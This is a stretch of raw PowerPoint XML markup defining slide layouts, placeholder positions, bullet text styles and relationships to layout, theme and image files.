            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="ru-RU" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>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19" name="Shape 19"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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Blank Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="217" name="Shape 217"/>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Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="218" name="Shape 218"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 219"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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220" name="Shape 220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="221" name="Shape 221"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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223" name="Shape 223"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="397728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Title, 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="224" name="Shape 224"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Shape 225"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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226" name="Shape 226"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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227" name="Shape 227"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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28" name="Shape 228"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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Only">
  <p:cSld name="Centered Text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="230" name="Shape 230"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Shape 231"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="530784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AndObj">
  <p:cSld name="Title, 2 Content and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="232" name="Shape 232"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Shape 233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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234" name="Shape 234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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235" name="Shape 235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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236" name="Shape 236"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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AndTwoObj">
  <p:cSld name="Title Content and 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="237" name="Shape 237"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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239" name="Shape 239"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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240" name="Shape 240"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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241" name="Shape 241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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OverTx">
  <p:cSld name="Title, 2 Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="242" name="Shape 242"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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244" name="Shape 244"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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245" name="Shape 245"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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246" name="Shape 246"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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OverTx">
  <p:cSld name="Title, Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="247" name="Shape 247"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Shape 248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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249" name="Shape 249"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="1097244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250" name="Shape 250"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="1097244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Only">
  <p:cSld name="Centered Text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="21" name="Shape 21"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="530784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fourObj">
  <p:cSld name="Title, 4 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="251" name="Shape 251"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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253" name="Shape 253"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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254" name="Shape 254"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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255" name="Shape 255"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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256" name="Shape 256"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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6 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="257" name="Shape 257"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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259" name="Shape 259"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="353304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260" name="Shape 260"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="1604520"/>
            <a:ext cx="353304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261" name="Shape 261"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="1604520"/>
            <a:ext cx="353304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262" name="Shape 262"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029800" y="3682080"/>
            <a:ext cx="353304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263" name="Shape 263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319640" y="3682080"/>
            <a:ext cx="353304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264" name="Shape 264"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="353304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AndObj">
  <p:cSld name="Title, 2 Content and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="23" name="Shape 23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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25" name="Shape 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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26" name="Shape 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="535428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27" name="Shape 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="5354280" cy="397728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AndTwoObj">
  <p:cSld name="Title Content and 2 Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="28" name="Shape 28"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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30" name="Shape 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="5354280" cy="397728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31" name="Shape 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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32" name="Shape 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="3682080"/>
            <a:ext cx="535428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OverTx">
  <p:cSld name="Title, 2 Content over Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="33" name="Shape 33"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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35" name="Shape 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="535428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36" name="Shape 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231960" y="1604520"/>
            <a:ext cx="535428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37" name="Shape 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="3682080"/>
            <a:ext cx="10972440" cy="189684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image" Target="../media/image1.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><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6.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6.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout45.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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><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theme" Target="../theme/theme4.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8.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout60.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout59.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme5.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6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5" name="Shape 5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="11448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7" name="Shape 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3977280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="114300" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="114300" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="114300" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="114300" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="114300" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="114300" lvl="5" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="114300" lvl="6" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
